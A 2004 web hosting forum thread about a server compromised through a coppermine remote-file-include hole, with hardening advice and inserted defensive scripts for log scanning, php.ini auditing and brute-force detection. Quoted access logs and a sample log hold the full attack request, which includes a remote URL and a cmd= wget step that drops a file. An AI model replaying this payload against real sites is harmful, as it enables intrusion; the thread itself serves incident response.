The Community Forums


Hacked through coppermine (phpNuke Module)

Discussion in 'General Discussion' started by AbeFroman, Sep 14, 2004.

  1. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    How can I prevent hacks like these?

    root@server105 [/usr/local/apache/domlogs]# ll /home/cbo/public_html/themes/subBlack3dBlue/forums/images/lang_english/data.php
    -rw-r--r-- 1 cbo cbo 5156 Mar 4 2004 /home/cbo/public_html/themes/subBlack3dBlue/forums/images/lang_english/data.php
    root@server105 [/usr/local/apache/domlogs]# cat boxxxxx.net | grep wget
    203.130.255.177 - - [06/Sep/2004:03:28:16 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.deathwar.org/root.txt?&cmd=wget;id HTTP/1.1" 200 3347 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.52 [en]"
    203.130.255.177 - - [06/Sep/2004:03:28:21 -0500] "GET /favicon.ico HTTP/1.1" 404 3854 "http://www.boxxxxx.net/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.deathwar.org/root.txt?&cmd=wget;id" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.52 [en]"
    203.130.255.177 - - [06/Sep/2004:03:31:53 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.deathwar.org/root.txt?&cmd=cd%20../../../../themes/subBlack3dBlue/forums/images/lang_english;wget%20chanary.net/tools/olddriver%20-O%20data.php HTTP/1.1" 200 4809 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.52 [en]"
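The three domlog lines above show the whole attack: a URL handed to coppermine's THEME_DIR parameter (a remote file include), a cmd= parameter carrying shell commands, and finally wget dropping a file into a writable theme directory. The following scan is an added example, not code from the original post: it flags exactly that request pattern in an Apache access log. The log it runs over is constructed for the example (RFC 5737 addresses, made-up hostnames); on a cPanel box you would point scan_rfi_log at /usr/local/apache/domlogs/<domain> instead.

```shell
#!/bin/sh
# Added example (not from the original post): flag remote-file-include and
# command-parameter requests in an Apache common/combined access log.

# scan_rfi_log LOG: print "client timestamp reason request" for every request
# whose query string hands a URL to a parameter (plain or %-encoded) or
# carries a cmd= parameter. Only the request line is inspected, so a follow-up
# like /favicon.ico whose *referer* carries the payload is not reported again.
scan_rfi_log() {
    awk '
    {
        req  = $7                      # "GET /path?query HTTP/1.1" -> $7 is path?query
        lreq = tolower(req)
        if (lreq ~ /[?&][^=&]*=(https?|ftp)(:\/\/|%3a%2f%2f)/) reason = "url-in-param"
        else if (lreq ~ /[?&]cmd=/)                               reason = "cmd-param"
        else next
        ts = $4; gsub(/\[/, "", ts)    # $4 is "[06/Sep/2004:03:28:16"
        printf "%s %s %s %s\n", $1, ts, reason, req
    }' "$1"
}

# rfi_hit_count LOG: number of flagged requests, handy for an alert threshold.
rfi_hit_count() { scan_rfi_log "$1" | wc -l | tr -d ' '; }

# Constructed sample log: one benign hit, the plain and the %-encoded form of
# the include, the browser's favicon follow-up, and an ordinary gallery page.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
192.0.2.10 - - [06/Sep/2004:03:20:01 -0500] "GET /index.php HTTP/1.1" 200 1204 "-" "Mozilla/4.0 (compatible)"
198.51.100.7 - - [06/Sep/2004:03:28:16 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.example/root.txt?&cmd=wget;id HTTP/1.1" 200 3347 "-" "Mozilla/4.0 (compatible)"
198.51.100.7 - - [06/Sep/2004:03:28:21 -0500] "GET /favicon.ico HTTP/1.1" 404 3854 "http://www.example.com/modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.example/root.txt" "Mozilla/4.0 (compatible)"
198.51.100.7 - - [06/Sep/2004:03:31:53 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http%3A%2F%2Fattacker.example%2Froot.txt%3F&cmd=cd%20../../../../themes;wget%20attacker.example/olddriver%20-O%20data.php HTTP/1.1" 200 4809 "-" "Mozilla/4.0 (compatible)"
203.0.113.5 - - [06/Sep/2004:04:02:09 -0500] "GET /modules/coppermine/thumbnails.php?album=3 HTTP/1.1" 200 2210 "-" "Mozilla/4.0 (compatible)"
EOF

scan_rfi_log "$SAMPLE_LOG"
echo "flagged requests: $(rfi_hit_count "$SAMPLE_LOG")"
```

The url-in-param rule is a signature, so a legitimate script that takes a URL as a parameter (a redirector, for instance) will show up too; treat the output as a review list, and treat any 200 response on such a request as a sign the include actually ran, as it did in the domlog above.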
     
  2. haze

    haze Well-Known Member

    Joined:
    Dec 21, 2001
    Messages:
    1,550
    Likes Received:
    3
    Trophy Points:
    38
    There are many things that can be done to help prevent these sorts of issues; here are just a few.

    1. Upgrade, or just don't use known vulnerable scripts.
    2. mod_security (Apache module)
    3. Strict permissions on files, folders and commonly known dumping grounds, such as /tmp
    4. Limit access to compilers (just an aid)
    5. Limit available functions via php.ini
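Item 5 of the list above is the one that maps most directly onto the hit in the first post: the included remote file could only run wget and id because PHP was allowed to include a URL and to call a command-execution function. What follows is an added example, not code from the original posts or from cPanel: two constructed php.ini fragments (a PHP 4-era default and a hardened counterpart) and a small checker that reports which of the relevant settings are missing. The php.ini path, the account path and the function list are assumptions for the example; point php_ini_findings at your real php.ini (on cPanel usually /usr/local/lib/php.ini) to audit it.

```shell
#!/bin/sh
# Added example, not from the original posts: php.ini settings that blunt a
# remote-file-include hit, with a checker for a real php.ini.

# Functions an included remote script or dropped web shell needs in order to
# run OS commands (the domlog shows wget and id being run through one).
DANGEROUS_FUNCS="system exec shell_exec passthru popen proc_open"

# ini_get FILE DIRECTIVE: value of the last assignment, comments stripped,
# whitespace and quotes removed; prints nothing if the directive is absent.
ini_get() {
    sed 's/[;#].*//' "$1" | grep -i "^[[:space:]]*$2[[:space:]]*=" | tail -n 1 \
        | cut -d= -f2- | tr -d ' \t"'
}

# php_ini_findings FILE: one finding per line; exit status 1 if any were found.
php_ini_findings() {
    rc=0
    # PHP 4 had no allow_url_include; allow_url_fopen alone decided whether
    # include($_GET['THEME_DIR']) could pull code from a remote URL.
    case "$(ini_get "$1" allow_url_fopen | tr 'A-Z' 'a-z')" in
        off|0|false|no) ;;
        "") echo "allow_url_fopen: not set, PHP defaults to On"; rc=1 ;;
        *)  echo "allow_url_fopen: On (remote include allowed)"; rc=1 ;;
    esac
    disabled=",$(ini_get "$1" disable_functions | tr 'A-Z' 'a-z'),"
    for f in $DANGEROUS_FUNCS; do
        case "$disabled" in
            *",$f,"*) ;;
            *) echo "disable_functions: $f still callable"; rc=1 ;;
        esac
    done
    # open_basedir limits which paths PHP itself may read or include; it does
    # not restrict commands run through system(), so it complements the above.
    [ -n "$(ini_get "$1" open_basedir)" ] \
        || { echo "open_basedir: not set"; rc=1; }
    return $rc
}

# Constructed sample configs: the weak defaults beside the hardened form.
WEAK_INI=$(mktemp); HARD_INI=$(mktemp)
cat > "$WEAK_INI" <<'EOF'
; constructed: PHP 4 defaults of the day
allow_url_fopen = On
disable_functions =
EOF
cat > "$HARD_INI" <<'EOF'
; constructed: hardened counterpart
allow_url_fopen = Off
disable_functions = system, exec, shell_exec, passthru, popen, proc_open, proc_close
open_basedir = "/home/cbo/public_html:/tmp"
EOF

echo "--- weak ---";     php_ini_findings "$WEAK_INI" || true
echo "--- hardened ---"; php_ini_findings "$HARD_INI" && echo "no findings"
```

None of this replaces item 1: a script that includes whatever URL or path a request names is still broken, and with allow_url_fopen off an attacker can point THEME_DIR at a local file they uploaded elsewhere. The settings buy time and cut off the easy wget-and-run path; removing the vulnerable file closes the hole.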
     
  3. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    Can you share a copy of your php.ini file here?
     
  4. drmike

    drmike Active Member

    Joined:
    Jul 8, 2004
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Charlotte, NC
  5. damainman

    damainman Well-Known Member

    Joined:
    Nov 13, 2003
    Messages:
    515
    Likes Received:
    0
    Trophy Points:
    16
    Did he actually hack your server, and what did he do?
     
  6. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    He didn't get root access; he just uploaded an eggdrop.
     
  7. StevenC

    StevenC Well-Known Member

    Joined:
    Jan 1, 2004
    Messages:
    254
    Likes Received:
    0
    Trophy Points:
    16
    Typical script kiddie action. Again, if you had used the damn search feature you would have known that.
     
  8. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    What do I search for, "egg drop"?
     
  9. Ben

    Ben Well-Known Member

    Joined:
    Aug 19, 2002
    Messages:
    77
    Likes Received:
    0
    Trophy Points:
    6
    Damn guys, chill out.

    To the original poster, I'd recommend mounting /tmp noexec and installing phpSuExec. That'll make you a little more secure, hopefully enough to dissuade further attempts.
     
  10. cazny

    cazny BANNED

    Joined:
    Sep 3, 2004
    Messages:
    55
    Likes Received:
    0
    Trophy Points:
    0
    With your attitude I know not to do business with you
     
  11. haze

    haze Well-Known Member

    Joined:
    Dec 21, 2001
    Messages:
    1,550
    Likes Received:
    3
    Trophy Points:
    38
    It's common sense really, and I'm sure TLG can manage without your business.

    90% of the questions Abefroman asks are already answered. This is NOT a forum to help you administrate your server. This forum's purpose is to assist others and discuss cPanel related topics. With all these unmanaged server providers popping up, everyone and their dog thinks they can now run a hosting business. It's just not that easy, and if he wants help, he's going to have to learn how to help himself (google.com) and utilize the tools already provided for him rather than waste the space he takes up posting his nonsense.

    I think we can all have a say; perhaps we all don't see eye to eye, but it's going to sink in some time.

    Abefroman, might I suggest you head over to http://www.webhostingtalk.com (the technical and security forums might be the best place to post). Otherwise, please try and keep it to the newbie forums. Might help us hold on to what sanity we do have left :P :D
     
  12. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    They are installing it into a user's directory and not /tmp.

    I have phpSuExec.

    I have disabled dangerous php functions and removed the exploitable coppermine file.
     
  13. AbeFroman

    AbeFroman BANNED

    Joined:
    Feb 16, 2002
    Messages:
    654
    Likes Received:
    1
    Trophy Points:
    0
    WHT sucks. I will continue to post here; I have made several helpful posts in threads that other people have started.
     
  14. DigiCrime

    DigiCrime Well-Known Member

    Joined:
    Nov 27, 2002
    Messages:
    399
    Likes Received:
    0
    Trophy Points:
    16
    chmod 750 /usr/bin/wget

    By simply chmod'ing the file so that no non-wheel or root user can use it, we can eliminate many possible problems. The downside to doing this is that shell users will be inconvenienced by not being able to use the commands below. Mod_security really removes the need to chmod this, but it is an added layer of protection.
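One detail worth checking before relying on the chmod above: mode 750 keeps out everyone who is not the owner or a member of the file's current group, and on most systems /usr/bin/wget is group root, so the wheel users the post has in mind would be locked out along with everyone else unless the group is changed too. The script below is an added example, not part of the original post or of cPanel: it sets the group and the mode for every download tool it finds, verifies that the "other" execute bit is really gone, and demonstrates on throwaway copies so it can run unprivileged. The group name wheel and the binary list are assumptions; as root you would run restrict_fetchers wheel /usr/bin/wget /usr/bin/curl /usr/bin/lynx.

```shell
#!/bin/sh
# Added example, not from the original post: chgrp + chmod 0750 for download
# tools, with a verification step.

# others_can_execute FILE: succeeds if the "other" execute bit is set.
# -prune stops find from descending, -perm -001 tests the o+x bit.
others_can_execute() {
    [ -n "$(find "$1" -prune -perm -001 2>/dev/null)" ]
}

# restrict_fetchers GROUP BIN...: group-own each binary and make it 0750,
# skipping tools that are not installed. Needs root for real system binaries.
restrict_fetchers() {
    group="$1"; shift
    for bin in "$@"; do
        [ -f "$bin" ] || { echo "skip $bin (not installed)"; continue; }
        chgrp "$group" "$bin" && chmod 0750 "$bin" || return 1
        if others_can_execute "$bin"; then echo "FAILED $bin"; return 1; fi
        echo "restricted $bin -> group $group, mode 0750"
    done
}

# Demo on empty stand-in files in a temp dir (constructed; runs as any user,
# using the caller's own primary group in place of wheel).
DEMO_DIR=$(mktemp -d)
for t in wget curl lynx; do : > "$DEMO_DIR/$t"; chmod 0755 "$DEMO_DIR/$t"; done
restrict_fetchers "$(id -gn)" "$DEMO_DIR/wget" "$DEMO_DIR/curl" "$DEMO_DIR/lynx" "$DEMO_DIR/fetch"
```

With phpSuExec the PHP process runs as the account user, and without it as nobody; neither is in wheel, so the wget in the domlog would have failed either way. The attacker can still fetch with anything else that is executable (curl, lynx, a perl LWP one-liner) or simply paste the payload through the same include hole, which is why this is, as the post says, a layer rather than a fix.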
     
  15. drmike

    drmike Active Member

    Joined:
    Jul 8, 2004
    Messages:
    31
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Charlotte, NC
    Got to agree with that. The moderators act like god-like beings and, if you're one of their advertisers, you can get away with anything. I got banned for asking a host why they didn't honor their 30 day guarantee when they keep posting about it. I posted politely about my account which I had closed out within 7 days after having a 41% uptime rating, they complained, away I went. Follow ups went unanswered and INet basically told me that I should be kissing their rear for "providing such a rich environment" IIRC.

    -drmike
     
    #15 drmike, Sep 20, 2004
    Last edited: May 20, 2006
  16. hostit1

    hostit1 Well-Known Member

    Joined:
    Jul 24, 2003
    Messages:
    88
    Likes Received:
    0
    Trophy Points:
    0
    I would like to chime in a little

    I am NOT a security expert at all, but I wanted to share some thoughts on security. I owe the little knowledge that I do know to many generous posters here on the forum, employees and friends in the industry.

    I don't know if there is any such thing as a "Hack Proof" machine, but there are steps that you can take to help secure your system. Someone chimed in on many simple and important things in this post. Here are some ideas:

    1.) Limit php functions
    2.) Run /scripts/securetmp (Someone defaced EVERY index.htm* file on one of our servers a few years back because they were able to put a file and execute it from the tmp directory . . . we were ignorant)
    3.) Install a firewall and block everything except for needed ports. This is easy to do and will help.
    4.) Enable suexec. If you can't enable suexec, run a script that will email you processes that are run as nobody every few hours. This will only HELP detect hacks that are already present on the system and running as nobody at the time the script is executed. Believe me, many of these scripts can run for hours, days, weeks . . .
    5.) jailshell your shell users and ONLY grant shell to people who need it. Monitor what your users are doing. If you think that someone is doing something wrong, take a peek at their .bash_history (if they did not delete it).
    6.) Run chkrootkit which again . . . will only HELP detect root kits. If you have a machine that is compromised, move your users off of the server to a 100% clean server.
    7.) For heaven's sake, secure your root password and change it. Don't login directly via root (disable that feature if possible).
    8.) A script that will notify you when someone has logged in as root (don't rely on that 100%).
    9.) Save some money and hire an expert to "harden" your machines and give you pointers.
    10.) Install an IDS and some type of application that will check the checksums of "commonly hacked binaries".
    11.) Keep your kernel and software up2date! Especially forum web apps and PHPNUKE!
    12.) BFD (Brute Force Detection). Parse or grep your /var/log/messages for things like "invalid user" and the like. YOU ARE GOING TO FIND brute force attempts if your computer is plugged into the Internet. Block IP addresses that do attempt to BF into your box.
    13.) Security (good security) is a full-time job. Hire a good security analyst.


    A nice simple script to help detect processes run as nobody:
    *NOTE: some processes, such as perl/cgi httpd processes, are normal. It's little processes such as .eggdrop and other suspicious processes that are run as nobody.

    #!/bin/bash
    # Lists processes running as "nobody" that are not the usual daemons and
    # mails the list. Run it from cron every few hours.
    REPORT=$(mktemp)
    function gethack {
        echo "=== Run ls -alh /proc/<PID> to find the binary behind a suspicious process ==="
        # -u nobody selects by real user, so a command line that merely
        # contains the word "nobody" is not matched and grep never lists itself
        ps -u nobody -o pid,ppid,etime,args | grep -Ev 'apache|entropy|proftp|cpanel'
        echo "============"
        echo
    }
    gethack > "$REPORT"
    # mail wants the subject before the recipient address
    mail -s "servername hack check report" youremailaddress@yourdomain.com < "$REPORT"
    rm -f "$REPORT"
    exit 0


    How to have an email sent when someone logs in as root:

    Edit the /root/.bash_profile using vi, nano, pico or some txt editing tool (ie pico /root/.bash_profile)

    Add the below to the bottom of the file:
    echo 'ALERT - Root Shell Access on:' `date` `who` | mail -s "Alert: Root Access on Server ip address 10.1.1.2" emailaddress@yourdomain.com
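Item 12 of the list above (grep the log for invalid user, then block the address) is the one step in the post with no script attached. The following is an added example, not from the original post or from any BFD package: an awk pass over sshd log lines that counts failed logins per source address, reports those over a threshold, and prints the firewall rules for review rather than applying them. The log lines are constructed for the example (RFC 5737 addresses, hostname taken from the first post); on a real server point brute_force_ips at /var/log/messages or /var/log/secure, whichever sshd logs to, and run it from cron.

```shell
#!/bin/sh
# Added example, not from the original post: count sshd login failures per
# source address and emit block rules for the noisy ones.

# brute_force_ips LOG MIN: print "ip count" for every address with at least
# MIN "Invalid user" or "Failed password" lines, busiest first.
brute_force_ips() {
    awk -v min="$2" '
        /sshd\[[0-9]+\]: (Invalid user|Failed password for)/ {
            # the source address is the token after "from"
            for (i = 1; i <= NF; i++) if ($i == "from") { n[$(i+1)]++; break }
        }
        END { for (ip in n) if (n[ip] >= min) printf "%s %d\n", ip, n[ip] }
    ' "$1" | sort -k2,2nr -k1,1
}

# block_rules IP...: the iptables rules to review and then apply as root.
# With APF you would run "apf -d IP" instead.
block_rules() {
    for ip in "$@"; do printf 'iptables -I INPUT -s %s -j DROP\n' "$ip"; done
}

# Constructed sample: one address hammering invalid accounts and root, one
# user who mistyped a password once, and an unrelated proftpd line.
AUTH_LOG=$(mktemp)
cat > "$AUTH_LOG" <<'EOF'
Sep 14 02:11:03 server105 sshd[2104]: Invalid user admin from 203.0.113.8
Sep 14 02:11:05 server105 sshd[2104]: Failed password for invalid user admin from 203.0.113.8 port 4321 ssh2
Sep 14 02:11:09 server105 sshd[2107]: Invalid user test from 203.0.113.8
Sep 14 02:11:12 server105 sshd[2107]: Failed password for invalid user test from 203.0.113.8 port 4322 ssh2
Sep 14 02:11:20 server105 sshd[2110]: Failed password for root from 203.0.113.8 port 4325 ssh2
Sep 14 02:15:44 server105 sshd[2150]: Failed password for bob from 192.0.2.44 port 51020 ssh2
Sep 14 02:15:50 server105 sshd[2150]: Accepted password for bob from 192.0.2.44 port 51020 ssh2
Sep 14 02:20:00 server105 proftpd[2200]: 203.0.113.9 - USER anonymous: no such user found
EOF

echo "addresses with 3 or more failures:"
brute_force_ips "$AUTH_LOG" 3
echo "rules to apply:"
brute_force_ips "$AUTH_LOG" 3 | while read -r ip count; do block_rules "$ip"; done
```

The threshold is what keeps the legitimate user with one typo (192.0.2.44 here) off the block list; pick it per server and, as the post says, do not treat a quiet log as proof of anything. Rules inserted this way are gone after a reboot, so anything you decide to keep belongs in the firewall's saved configuration.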
     